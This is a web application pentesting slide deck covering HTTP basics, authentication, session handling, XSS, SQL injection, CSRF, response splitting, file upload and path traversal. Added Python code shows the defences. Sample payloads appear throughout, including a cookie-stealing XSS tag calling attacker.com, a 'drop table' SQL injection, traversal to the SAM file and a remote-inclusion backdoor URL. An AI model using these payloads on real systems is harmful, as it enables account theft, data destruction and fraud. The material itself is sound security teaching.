Web Application Security Satish B [email protected] http://www.securitylearn.net

Pentesting web applications


Page 1: Pentesting web applications

Web Application Security

Satish [email protected]

http://www.securitylearn.net

Page 2: Pentesting web applications

Web Application Security

Is it only hacking? No.

Page 3: Pentesting web applications

Web Application Security


Page 4: Pentesting web applications

Web Application Security

- Background: history, HTTP, HTTPS…
- Information gathering: platform details, application knowledge, domain knowledge…
- Manual testing: XSS, SQL injection, CSRF…
- Tools: scanners…
- Remediation: suggestions…
- Documentation: reports…
- Risk assessment

Page 5: Pentesting web applications

URI

The Request-URI is a Uniform Resource Identifier. It identifies the resource upon which to apply the request.

http://www.address.edu:1234/path/subdir/file.ext

- http:// is the protocol
- www.address.edu is the host (hostnames are case-insensitive)
- 1234 is the port (80 is the default port for HTTP)
- /path/subdir/file.ext is the path to the file or resource

Page 6: Pentesting web applications

HTTP

To understand the web we need to know about HTTP, the Hypertext Transfer Protocol.

- Application layer protocol
- Uses TCP as its transport mechanism
- Core communication protocol for accessing the web
- Message-based model: the client message is the request, the server message is the response
- Stateless: the server does not maintain user information between requests
- Cookies were introduced to make it stateful

Page 7: Pentesting web applications

HTTP Transaction

Page 8: Pentesting web applications

HTTP Message Types

HTTP messages consist of requests from client to server and responses from server to client. Both types of message consist of:

- a start-line (a request-line or a status-line)
- zero or more header-fields (also known as "headers")
- an empty line (i.e., a line with nothing preceding the CRLF) indicating the end of the header fields
- and (possibly) a message-body

Page 9: Pentesting web applications

HTTP Request

Request Line + Headers + Empty Line

Request Line = Method + Resource Location + HTTP Version

Sample:

GET /books/search.asp?q=wahh HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb,en-us;
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.example.com

Page 10: Pentesting web applications

HTTP Request

Request Line + Headers + Empty Line + Body

Request Line = Method + Resource Location + HTTP Version

Sample:

POST /books/search.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb,en-us;
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.example.com
Content-Length: 10

q=Wahh

Page 11: Pentesting web applications

HTTP Response

Response Line + Headers + Empty Line + Body

Response Line = HTTP Version + Response Code

Sample:

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 13:49:37 GMT
Server: IBM_HTTP_SERVER/1.3.26.2 Apache/1.3.26 (Unix)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 24246

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>

Page 12: Pentesting web applications

HTTP Methods

- GET: retrieve resources
- POST: perform actions
- HEAD: check the existence of a resource
- TRACE: diagnostic purposes
- OPTIONS: find the HTTP methods that are available for a resource
- PUT: upload a resource to the server
- DELETE: delete a resource on the server

Page 13: Pentesting web applications

HTTP Methods

- Safe methods retrieve information and should not change server state: GET, HEAD, TRACE, OPTIONS
- Unsafe methods make changes to the server state: PUT, POST, DELETE

Page 14: Pentesting web applications

HTTP Header-Fields

HTTP header-fields include general-headers, request-headers, response-headers and content-headers. Each header-field consists of a name followed by a colon and the field value.

Page 15: Pentesting web applications

Security Issues in HTTP

- Privacy: anyone can see the content
- Integrity: someone might alter the content
- Authentication: it is not clear who you are talking with

Page 16: Pentesting web applications

HTTPS

HTTP is unencrypted and insecure. HTTPS uses a secure transport mechanism (SSL) that protects the privacy and integrity of all data passing over the network.

Page 17: Pentesting web applications

HTTPS Transaction

Page 18: Pentesting web applications

TLS Basics

TLS consists of two protocols:

- Handshake protocol: uses public-key cryptography to establish a shared secret key between the client and the server
- Record protocol: uses the secret key established in the handshake protocol to protect communication between the client and the server

We will focus on the handshake protocol.

Page 19: Pentesting web applications

Handshake Protocol Structure

- Client to server: ClientHello
- Server to client: ServerHello, [Certificate], [ServerKeyExchange], [CertificateRequest], ServerHelloDone
- Client to server: [Certificate], ClientKeyExchange, [CertificateVerify], then the client switches to the negotiated cipher and sends Finished
- Server to client: the server switches to the negotiated cipher and sends Finished

Messages in square brackets are optional.

Page 20: Pentesting web applications

Proxy

A proxy mediates access between the client browser and the destination web server. When a browser has been configured to use a proxy:

- the browser sends all of its requests to the proxy
- the proxy passes the requests to the relevant web servers
- the proxy forwards the responses back to the browser

Most proxies also provide additional services, including caching, authentication and access control. A proxy is a program which acts as both client and server; it can modify the request in between and maintain caches.

Page 21: Pentesting web applications

Encoding techniques

Different representations of the same data:

- URL encoding: for characters not permitted in URLs, e.g. %20 for a space
- Unicode: designed to support all the writing systems in the world, e.g. %u2215 for /
- HTML encoding: represents problematic characters so they can be safely incorporated in an HTML page, e.g. &quot; for the double quote and &amp; for &
- Base64 encoding: processes the input in blocks of 3 bytes using the alphabet ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ ; for example VGhlIFdlYiBBcHBsaWNhdGlvbiBIYWNrZXIncyBIYW5kYm9vaw== decodes to "The Web Application Hacker's Handbook"

Page 22: Pentesting web applications

Web Application Security (agenda recap): background; information gathering; manual testing; tools; remediation; documentation; risk assessment

Page 23: Pentesting web applications

Profiling application

To find resources on the server:

- Web spidering, web crawling
- Brute force, to discover hidden content
- Use search engines, e.g. site:google.com

Gain application knowledge and identify server technologies:

- Banner grabbing, meta tags (tool: httprint; online: netcraft.com)
- File extensions: asp (Microsoft Active Server Pages), aspx (Microsoft ASP.NET), jsp (Java Server Pages), cfm (Cold Fusion), php (the PHP language)

Page 24: Pentesting web applications

Profiling application

From session tokens:

- JSESSIONID: the Java Platform
- ASPSESSIONID: Microsoft IIS server
- ASP.NET_SessionId: Microsoft ASP.NET
- CFID/CFTOKEN: Cold Fusion
- PHPSESSID: PHP

Identify input locations. Look for the robots.txt file. Error codes in the application, e.g.:

Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[DBNETLIB][ConnectionOpen(Connect())] - SQL server does not exist or access denied

Page 25: Pentesting web applications

Profiling application

Request:

GET /books/search.asp?q=wahh HTTP/1.1
Accept-Language: en-gb,en-us;
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.example.com

Response (the Server header reveals the platform):

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 13:49:37 GMT
Server: Apache/1.3.26 (Unix)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
…

Page 26: Pentesting web applications

Web Application Security (agenda recap): background; information gathering; manual testing; tools; remediation; documentation; risk assessment

Page 27: Pentesting web applications

Common attacks

- Attacking authentication
- Attacking authorization
- Cryptography weaknesses
- Breaking session management
- Cross site scripting
- SQL injection
- Cross site request forgery
- URL redirection
- HTTP response splitting
- File upload
- Path traversal attacks
- Server configuration issues, caching
- Attacking the web server

Page 28: Pentesting web applications

Authentication

- What: confirms the identity of a user
- Why: to protect web content
- Normally relies on username and password
- Authentication takes place with every browser-server interaction
- Types:
  - HTTP integrated: Basic, Digest (hash), NTLM (integrated Windows)
  - Form-based: parameters delivered by POST

Page 29: Pentesting web applications

Authentication

HTTP Basic authentication flow (figure): the client sends a request; the server answers with a 401 response; the user supplies login credentials; the client resends the request with the Base64-encoded credentials; the server returns a valid response.

Page 30: Pentesting web applications

Attacking Authentication

- Try default accounts and passwords, e.g. admin/admin
- Capture credentials over HTTP (unencrypted channel)
- Capture credentials passed in URLs
- Autocomplete on the login page
- "Remember me"
- Predictable usernames: numbers, emails
- Password requirements: length, allowed characters (real attack: Gawker)
- Brute-force attacks: dictionary attack, search attack; account lockout
- Through error messages such as "User account not found" or "Password incorrect"
- Change password without the original

Page 31: Pentesting web applications

Attacking Authentication

- Shoulder surfing
- Forgot-password functionality
- Forceful browsing: authentication not verified on the server

Page 32: Pentesting web applications

Common attacks (section divider; list as on page 27)

Page 33: Pentesting web applications

Authorization

- What: specifies the access rights of a user
- Why: to control access to web content/resources
- Normally relies on access control policies
- Authorization takes place with every browser-server interaction
- Types:
  - Programmatic control: every user's access is stored in the database
  - Role-based control: roles contain different sets of privileges and each user is assigned to one role

Page 34: Pentesting web applications

Attacking Authorization

- Tampering with parameters, e.g. http://www.citibank.com/userprofile.php?user=satish
- Directly requesting restricted resources
- Horizontal escalation
- Vertical escalation

Page 35: Pentesting web applications

Common attacks (section divider; list as on page 27)

Page 36: Pentesting web applications

Cryptography

- Cipher: encryption and decryption algorithms
- Transposition cipher: rearranges the letters in a word, e.g. 'help' becomes 'ehpl'
- Substitution cipher: replaces a letter with a different letter, e.g. 'abc' becomes 'bcd', here replacing each letter by the following one (a+1=b)
- Symmetric algorithms: use the same key for encryption and decryption
- Asymmetric algorithms: use different keys for encryption and decryption
- Steganography: hiding messages in images
- Use of weak algorithms for HTTPS; SSL testing: SSL Digger
- Use of weak hashing algorithms: MD5 passwords, rainbow tables

Page 37: Pentesting web applications

Cryptography Weaknesses

- Use of weak algorithms for HTTPS; SSL testing: SSL Digger
- Use of weak hashing algorithms: MD5 passwords, rainbow tables, e.g. http://www.tmto.org/pages/passwordtools/hashcracker/
- Remedy: PBKDF2 (salted, iterated password hashing) instead of plain MD5
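As an added example (not from the slides), the following Python contrasts an unsalted MD5 password hash, which a rainbow table maps straight back to the password, with the PBKDF2 remedy named above; the iteration count and the stored-string layout are assumptions of this example.

```python
import hashlib
import hmac
import os
from typing import Optional

# Assumed work factor for this example; tune it to your hardware budget.
PBKDF2_ITERATIONS = 600_000


def md5_password(password: str) -> str:
    """The weak scheme from the slide: no salt and one fast hash, so equal
    passwords produce equal digests and a precomputed (rainbow) table maps a
    digest straight back to the password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def pbkdf2_hash(password: str, salt: Optional[bytes] = None,
                iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, iterated hash stored as 'pbkdf2_sha256$iterations$salt$digest'
    (hex fields). A fresh 16-byte random salt is drawn when none is given, so
    two users with the same password get different stored values and a
    precomputed table is useless."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
        salt = bytes.fromhex(salt_hex)
        rounds = int(iterations)
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    # Constructed sample: two accounts that chose the same password.
    print(md5_password("password"), md5_password("password"))   # identical digests
    first, second = pbkdf2_hash("password"), pbkdf2_hash("password")
    print(first == second, pbkdf2_verify("password", first), pbkdf2_verify("letmein", first))
```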

Page 38: Pentesting web applications

Common attacks (section divider; list as on page 27)

Page 39: Pentesting web applications

Session Management

A session ID is used to associate specific web page activity with a specific user, giving the otherwise stateless web application a sense of state. It may be transmitted in:

- GET: ends up in the browser history and in server logs
- POST: difficult to POST in every request
- Cookie

Page 40: Pentesting web applications

Breaking Sessions

- Secure flag
- HttpOnly flag
- Static session: the same session ID for the user on every login
- Randomness: session ID strength and length
- Meaningful cookies: username in cookies
- Reusing cookies: log in multiple times; Burp Sequencer
- Session ID in the URL
- Persistent cookies
- Session timeout
- Session fixation
- Logout does not expire the session

Page 41: Pentesting web applications

Common attacks (section divider; list as on page 27)

Page 42: Pentesting web applications

Cross Site Scripting

Breaks the same origin policy. A loophole in the application using which an attacker can inject malicious scripts into a page sent by your server. Browsers treat these injected scripts like any other script in the page.

- "Cross-site" means: foreign script sent via the server to the client. The attacker makes the web server deliver malicious script code; the malicious script is executed in the client's web browser.
- Scripting: web browsers can execute commands embedded in the HTML page. Different languages are supported (JavaScript, VBScript, ActiveX, etc.); the most prominent is JavaScript.
- Types: stored XSS, reflective XSS, DOM based XSS

Page 43: Pentesting web applications

Cross Site Scripting

- DOM based XSS: a piece of JavaScript accesses the URL request parameters and uses that information to write HTML content to its own page without HTML encoding.
- Reflective XSS (non-persistent): data provided by a web client is used immediately by server-side scripts to generate a page of results for that user.
- Stored XSS (persistent): data provided to a web application by a user is first stored persistently on the server (in a database, file system, or other location), and later displayed to users in a web page without being encoded using HTML entities. Ex: blogs, comments, job postings.

Page 44: Pentesting web applications

Cross Site Scripting

The client browser sends an error message to the web server:

https://example.com/error.php?message=Sorry%2c+an+error+occurred

The error message is "reflected" back from the web server to the client in a web page:

<p>Sorry, an error occurred.</p>

We can replace the error message with JavaScript:

https://example.com/error.php?message=<script>alert('xss');</script>

Page 45: Pentesting web applications

Anatomy of XSS

- User logs into the legitimate site.
- Site sends the user an authentication cookie.
- Attacker sends an XSS attack containing injected code to the user:
  https://example.com/error.php?message=<img src='http://attacker.com/'+document.cookie/>
- User clicks on the XSS link in email, web or IM.
- Browser contacts the vulnerable URL at the legitimate site.
- Legitimate site returns the injected code in the web page.
- Browser runs the injected code, which sends the cookie to attacker.com.
- The attacker monitors requests to attacker.com and captures the user cookie.
- Attacker uses the cookie to authenticate to the legitimate site as the user.

Page 46: Pentesting web applications

Cross Site Scripting Impact

- Hijack user accounts: steal cookies, steal credentials
- Modify web pages (defacement): the company loses its public image, money and customers
- Record keystrokes from the browser, steal clipboard data, execute commands on the client machine
- Cause denial of service: crash the browser

The attacker can do anything the user can do on his machine.

Page 47: Pentesting web applications

XSS Remedy

- Validate input: input data contains only a certain permitted set of characters; choose a white list; perform server-side validation
- Encode output: if the application copies user input into responses, this data should be encoded properly using HTML encoding. Ex: escape & < > " ' as &amp; &lt; &gt; &quot; &#39;
- Mark session cookies as HttpOnly to protect them from being stolen
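As an added example (not from the slides), this Python renders the reflected error page from the XSS example the unsafe way and the safe way, using the escape table from the remedy above, and builds the HttpOnly session cookie header; the white-list pattern and the cookie name are assumptions of this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Escape table from the remedy slide: & < > " ' -> &amp; &lt; &gt; &quot; &#39;
HTML_ESCAPES = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;"}

# Assumed white list for the error text: letters, digits, space and a few punctuation marks.
ALLOWED_MESSAGE = re.compile(r"[A-Za-z0-9 ,.!?-]*")


def html_encode(text: str) -> str:
    """Output encoding: each special character is replaced independently, so
    input that already looks encoded (e.g. '&lt;') is encoded again rather than
    passed through as markup."""
    return "".join(HTML_ESCAPES.get(ch, ch) for ch in text)


def message_is_valid(text: str) -> bool:
    """Input validation (server side): accept only characters from the white list."""
    return ALLOWED_MESSAGE.fullmatch(text) is not None


def message_from_url(url: str) -> str:
    """The 'message' query parameter as error.php would see it after URL decoding."""
    return parse_qs(urlsplit(url).query).get("message", [""])[0]


def render_error_vulnerable(url: str) -> str:
    """Reflects the parameter verbatim; an injected <script> runs as page script."""
    return "<p>" + message_from_url(url) + "</p>"


def render_error_safe(url: str) -> str:
    """Same page with output encoding; a payload is displayed as text, not executed."""
    return "<p>" + html_encode(message_from_url(url)) + "</p>"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie line for the session token: HttpOnly hides it from document.cookie
    (the cookie-stealing payload on the XSS anatomy slide); Secure keeps it off plain HTTP."""
    return f"Set-Cookie: SESSIONID={session_id}; Path=/; Secure; HttpOnly"


if __name__ == "__main__":
    # Constructed request for the slide's payload, percent-encoded as a browser sends it.
    payload_url = "https://example.com/error.php?message=%3Cscript%3Ealert(%27xss%27)%3B%3C/script%3E"
    print(message_is_valid(message_from_url(payload_url)))   # False: fails the white list
    print(render_error_vulnerable(payload_url))
    print(render_error_safe(payload_url))
```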

Page 48: Pentesting web applications

Common attacks (section divider; list as on page 27)

Page 49: Pentesting web applications

SQL Injection

Every web application uses a database to store information. SQL is used to manage information in the database. User-supplied data is incorporated into SQL statements, either in an unsafe way (SQL injection) or in a safe way (secure).

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. This alters the execution behaviour of the backend query and allows an attacker to execute unauthorized SQL commands.

- Types: error based SQLi; blind SQLi (time based delays, union queries)
- Tools: SQLMap, SQLNinja, Absinthe

Page 50: Pentesting web applications

SQL Injection

Classified based on data retrieval:

- Inbound: error based data retrieval
- Outbound: direct connection to the database or communication through another channel
- Inference: data extraction in blind SQL injection

Page 51: Pentesting web applications

SQL Injection Example

Books catalog: allows a user to search for a book by author name.

https://example.com/error.php?authorname=James

The backend query to retrieve the book details is:

SELECT title,year FROM books WHERE author = 'James'

Result: the web site displays the list of books written by James.

Page 52: Pentesting web applications

SQL Injection Example

If an attacker injects a character that SQL interprets, it alters the meaning of the backend query:

https://example.com/error.php?authorname=O'Reilly

The query becomes:

SELECT title,year FROM books WHERE author = 'O'Reilly'

The extra single quote breaks the syntax of the SQL statement.

Result: the web site displays an error message:

Incorrect syntax near 'Reilly'.
Unclosed quotation mark before the character string '

Page 53: Pentesting web applications

SQL Injection Example

The attacker injects an input which doesn't break the syntax:

https://example.com/error.php?authorname=James' or 2=2--

The backend query becomes (the -- comments out the trailing quote):

SELECT title,year FROM books WHERE author = 'James' or 2=2--'

Result: the web site displays the list of books written by James.

Page 54: Pentesting web applications

SQL Injection Example

The attacker can inject dangerous SQL statements:

https://example.com/error.php?authorname=James'; drop table books;--

The backend query becomes:

SELECT title,year FROM books WHERE author = 'James' ; drop table books;--

Result: the web site displays the list of books written by James, and the books table is deleted from the database.

Page 55: Pentesting web applications

SQL Injection Impact

- Alter the database: add new tables, delete existing tables, etc.
- Compromise user accounts by obtaining their passwords
- Collect sensitive data like credit card numbers, SSNs, etc.
- Access files on the server
- Cause denial of service by stopping the database

The attacker can do anything a DBA can do.

Page 56: Pentesting web applications

SQL Injection Remedy

- Validate input: input data contains only a certain permitted set of characters; choose a white list; perform server-side validation
- Parameterized queries (show samples), also known as prepared statements: define all the SQL statements first and then pass the parameters; the attacker cannot change the intent of the query
- Stored procedures also work
- To reduce the impact: store passwords in salted hash format; connect to the database with a low-privileged user
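As an added example (not from the slides), this Python runs the books-catalog query from the SQL injection example pages both by string concatenation and as a parameterized query against an in-memory SQLite table; the table rows are constructed for the example, and the stacked "drop table" case is not reproduced because the sqlite3 driver refuses multiple statements in one execute call.

```python
import sqlite3


def make_catalog() -> sqlite3.Connection:
    """In-memory books table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (title TEXT, year INTEGER, author TEXT)")
    conn.executemany("INSERT INTO books VALUES (?, ?, ?)", [
        ("Web Hacking Notes", 2011, "James"),
        ("Database Internals", 2009, "Alice"),
        ("Shell Tricks", 2005, "O'Reilly"),
    ])
    return conn


def search_vulnerable(conn: sqlite3.Connection, authorname: str):
    """The slide's backend query with the parameter pasted into the SQL text:
    a quote in the input becomes part of the statement."""
    sql = "SELECT title, year FROM books WHERE author = '" + authorname + "'"
    return conn.execute(sql).fetchall()


def vulnerable_query_error(conn: sqlite3.Connection, authorname: str):
    """Error text the error page would leak for a broken query, or None if it ran."""
    try:
        search_vulnerable(conn, authorname)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def search_safe(conn: sqlite3.Connection, authorname: str):
    """Parameterized query (prepared statement): the SQL text is fixed before the
    value is bound, so the input can only ever be compared as an author name."""
    return conn.execute(
        "SELECT title, year FROM books WHERE author = ?", (authorname,)
    ).fetchall()


if __name__ == "__main__":
    catalog = make_catalog()
    print(search_vulnerable(catalog, "James"))
    print(vulnerable_query_error(catalog, "O'Reilly"))      # syntax error leaks
    print(search_vulnerable(catalog, "James' or 2=2--"))     # every row comes back
    print(search_safe(catalog, "O'Reilly"))                  # quote handled correctly
    print(search_safe(catalog, "James' or 2=2--"))           # no author has that name
```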

Page 57: Pentesting web applications

Common attacks (section divider; list as on page 27)

Page 58: Pentesting web applications

Cross Site Request Forgery

Web applications use cookies to keep track of the user session. When an application sets a cookie in a user's browser, the browser will automatically submit that cookie back to the application in every subsequent request.

The browser submits the cookie regardless of whether the request originates from a link provided by the application itself or from a URL received from elsewhere, such as in an email or on another web site.

A cross-site request forgery hole is when a malicious web site can cause the user's browser to submit a request directly to the vulnerable application, to perform some unintended action that is beneficial to the attacker.

Tool: CSRFTester

Page 59: Pentesting web applications

CSRF Example

Bank website: allows transferring money from one account to another.

The transaction page in the bank website contains the following code:

<form method="POST" action="Transaction.asp">
  <input type="text" name="SourceAccount" value="">
  <input type="text" name="DestinationAccount" value="">
  <input type="text" name="Amount" value="">
</form>

Page 60: Pentesting web applications

Anatomy of CSRF

The user is logged into the bank website. The user visits a malicious website which sends the following request:

<img src="http://bank.com/?SourceAccount=23456&DestinationAccount=attackeraccount&Amount=10000">

The browser attaches the bank.com cookies to the above request and sends it to the server. The application transfers the amount to the attacker's account without the user's intervention.

Page 61: Pentesting web applications

CSRF Remedy

- Re-authenticate the user for every important transaction
- Use a CAPTCHA for sensitive transactions
- Random tokens in every request (this breaks the browser back button feature)
- Implement random tokens at every transaction (POST requests); do not transmit tokens in URLs; validate the token on the server side
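As an added example (not from the slides), this Python applies the per-transaction token remedy to the bank transfer form from the CSRF example: the token is issued into a hidden field of the POST form and checked server side, so the forged cross-site image request is rejected; the session dictionary, form markup and handler signature are assumptions of this example.

```python
import hmac
import secrets


def issue_csrf_token(session: dict) -> str:
    """Generate an unpredictable token and remember it in the server-side session."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def transfer_form(session: dict) -> str:
    """Transaction page: the token rides in a hidden field of the POST form,
    never in the URL, so a page on another origin cannot read or guess it."""
    token = issue_csrf_token(session)
    return (
        '<form method="POST" action="Transaction.asp">\n'
        f'  <input type="hidden" name="csrf_token" value="{token}">\n'
        '  <input type="text" name="SourceAccount" value="">\n'
        '  <input type="text" name="DestinationAccount" value="">\n'
        '  <input type="text" name="Amount" value="">\n'
        "</form>"
    )


def handle_transfer(session: dict, method: str, params: dict) -> str:
    """Server-side check. The browser attaches cookies to any request, but the
    token only arrives when the request came from our own form."""
    if method != "POST":
        return "rejected: transfers must be POSTed"
    expected = session.get("csrf_token")
    submitted = params.get("csrf_token", "")
    if not expected or not isinstance(submitted, str):
        return "rejected: missing CSRF token"
    if not hmac.compare_digest(expected.encode("utf-8"), submitted.encode("utf-8")):
        return "rejected: invalid CSRF token"
    return (f"ok: moved {params['Amount']} from {params['SourceAccount']} "
            f"to {params['DestinationAccount']}")


if __name__ == "__main__":
    session = {}
    # Constructed forged request, as the <img src=...> on the anatomy slide would send it.
    forged = {"SourceAccount": "23456", "DestinationAccount": "attackeraccount", "Amount": "10000"}
    print(handle_transfer(session, "GET", forged))
    transfer_form(session)                       # user loads the genuine page
    genuine = dict(forged, csrf_token=session["csrf_token"])
    print(handle_transfer(session, "POST", genuine))
```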

Page 62: Pentesting web applications

Common attacks (section divider; list as on page 27)

Page 63: Pentesting web applications

URL Redirection

A URL redirection brings the browser from one URL to another URL:

http://www.example.com/click.php?id=215&url=http://www.google.com

- Redirection to sites which install malware
- Possible to perform phishing attacks
- Possible to exploit browser vulnerabilities

Page 64: Pentesting web applications

Phishing

Acquiring sensitive information (username, password and credit cards) by masquerading as a trusted website.

Attack scenario: the attacker convinces the victim to click on the link of a fake login page which resembles a genuine login page. The victim enters his credentials in the fake login page and they go to the attacker. The victim is then redirected to an error page or to the genuine website, depending on the attacker.

Tool: Social Engineering Toolkit

Page 65: Pentesting web applications

URL Redirection Remedy

Validate user input properly. Create a mapping for page names on the server and use the mapped values in requests. Ex: 1 – home.asp, 2 – index.asp

URL: http://www.example.com/redirect.php?=1

Page 66: Pentesting web applications

Common attacks (section divider; list as on page 27)

Page 67: Pentesting web applications

HTTP Response Splitting

HTTP protocol: headers are separated by a single CR/LF line break; the headers are separated from the body by two line breaks.

Attack possibility: when user data is inserted in response headers, e.g. cookies or the Location header. CRs and LFs are injected in such a manner that a second HTTP message is formed where only one was expected by the application: the injected line breaks terminate the first response and form the second response.

Used to deface web sites, poison caches and trigger cross-site scripting.

Page 68: Pentesting web applications

HTTP Response Splitting

Original: http://www.mysite.com/default.aspx?user=a

Modified: http://www.mysite.com/default.aspx?user=a%0D%0A%0D%0AHTTP/1.1 200 OK

Response:

HTTP/1.1 200 OK
Location: http://www.mysite.com/default.aspx?user=a

HTTP/1.1 200 OK
…

Page 69: Pentesting web applications

HTTP Response Splitting Remedy

Validate input properly. Do not insert user input in response headers.
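As an added example (not from the slides), this Python implements a small parser for the HTTP message layout from the HTTP Message Types page and uses it to show how the response-splitting payload above turns one response into two, next to the remedy of never emitting a raw CR/LF in a header; the redirect is assumed to use a 302 status (the slide shows 200 OK) and the sample POST request in the test is constructed.

```python
from urllib.parse import quote, unquote

CRLF = "\r\n"


def parse_http_message(raw: str):
    """Split one HTTP message into (start_line, headers, body): start-line,
    header fields, an empty line, then whatever follows as the body."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def build_redirect_vulnerable(user_param: str) -> str:
    """Copies the URL-decoded 'user' value straight into the Location header,
    so %0D%0A in the input becomes a real line break inside the response."""
    location = "http://www.mysite.com/default.aspx?user=" + unquote(user_param)
    return CRLF.join(["HTTP/1.1 302 Found", "Location: " + location, "", ""])


def header_value(value: str) -> str:
    """Invariant for every header the application emits: no CR or LF inside."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF not allowed in a header value")
    return value


def build_redirect_safe(user_param: str) -> str:
    """Re-encodes the value so CR and LF become %0D and %0A, then checks the invariant."""
    user = quote(unquote(user_param), safe="")
    location = header_value("http://www.mysite.com/default.aspx?user=" + user)
    return CRLF.join(["HTTP/1.1 302 Found", "Location: " + location, "", ""])


def count_responses(raw: str) -> int:
    """Number of status lines a client parsing this byte stream would see."""
    count = 0
    remaining = raw
    while remaining:
        start_line, _, remaining = parse_http_message(remaining)
        if start_line.startswith("HTTP/"):
            count += 1
    return count


if __name__ == "__main__":
    payload = "a%0D%0A%0D%0AHTTP/1.1 200 OK"      # the modified URL's user parameter
    print(count_responses(build_redirect_vulnerable(payload)))   # 2: split into two responses
    print(count_responses(build_redirect_safe(payload)))         # 1: line breaks stay encoded
```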

Page 70: Pentesting web applications

Common attacks (section divider; list as on page 27)

Page 71: Pentesting web applications

File Upload

When a user is able to upload a file which is not validated by the server, a potential exists to upload malicious code to the server and execute it remotely.

If the web application allows file upload, it is important to check if it is possible to upload HTML content. For instance, if HTML or TXT files are allowed, an XSS payload can be injected in the uploaded file.

- Web shells: C99 shell, Pwn.jsp, Browser.asp
- Denial of service: uploading large files
- Null character (%00) attacks
- Client-side validation

Page 72: Pentesting web applications

File Upload Remedy

- Validate file names and implement a white list for allowed file extensions
- Configure antivirus on the web server for disk write events
- Put a size limit on file uploads
- Perform checks on the file header (MIME)

Demo on hex editor usage; demo and practical on web shells

Page 73: Pentesting web applications

Common attacks (section divider; list as on page 27)

Page 74: Pentesting web applications

Path Traversal Attacks

Web applications read from or write to the file system based on user-supplied data (file uploading and downloading). Unvalidated input allows the application to access files which are not intended for access, e.g. reading server configuration files and source code.

http://www.abc.com/getimpage.aspx?file=logo.jpg

The application extracts the value of the file parameter from the query string, appends this value to the prefix C:\wahh-app\images\, opens the file with this name, reads the file's contents and returns it to the client.

http://www.abc.com/getimpage.aspx?file=..\..\boot.ini
http://www.abc.com/getimpage.aspx?file=..\..\windows\repair\sam

Page 75: Pentesting web applications

File Inclusion Attacks

Languages support the use of include files; code in the include file is interpreted just as if it had been inserted at the location of the include directive. When include files are loaded from user input:

- Remote file inclusion: PHP is more vulnerable because the PHP include function accepts remote paths.
  https://app.com/main.php?Country=US
  https://app.com/main.php?Country=http://attacker.com/backdoor
- Local file inclusion: including other files on the same server, normally files that the user does not have access to.

Page 76: Pentesting web applications

Remedy

Validate user input properly. Blacklist ../ characters. Run the web server as a low-privileged user.
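As an added example (not from the slides), this Python confines the getimpage.aspx-style file lookup from the path traversal page to its image directory by canonicalising the requested path, and places the literal "blacklist ../" check from the remedy beside it to show which of the slide's own inputs that check lets through; the image root is a temporary directory created by the example and its contents are constructed.

```python
import os
import tempfile
from urllib.parse import unquote

# Stand-in for the slide's C:\wahh-app\images\ prefix: a fresh temp dir with one image.
IMAGE_ROOT = os.path.realpath(tempfile.mkdtemp(prefix="images-"))
with open(os.path.join(IMAGE_ROOT, "logo.jpg"), "wb") as fh:
    fh.write(b"constructed-jpeg-bytes")


def blacklist_allows(name: str) -> bool:
    """The remedy taken literally: reject names containing '../'.
    It never sees Windows separators or encoded dots."""
    return "../" not in name


def resolve_image(name: str):
    """Canonicalise the requested name under IMAGE_ROOT; None if it escapes.
    The check works on the resolved absolute path, so '..', backslashes and
    percent-encoding are all handled before the comparison."""
    name = unquote(name)
    if "\0" in name:                      # %00 truncation tricks
        return None
    name = name.replace("\\", "/")        # treat ..\..\ like ../../
    candidate = os.path.realpath(os.path.join(IMAGE_ROOT, name))
    try:
        inside = os.path.commonpath([IMAGE_ROOT, candidate]) == IMAGE_ROOT
    except ValueError:                    # different drives on Windows
        inside = False
    if not inside or not os.path.isfile(candidate):
        return None
    return candidate


def read_image(name: str):
    """What the handler returns to the client: the file bytes, or None when refused."""
    path = resolve_image(name)
    if path is None:
        return None
    with open(path, "rb") as fh:
        return fh.read()


if __name__ == "__main__":
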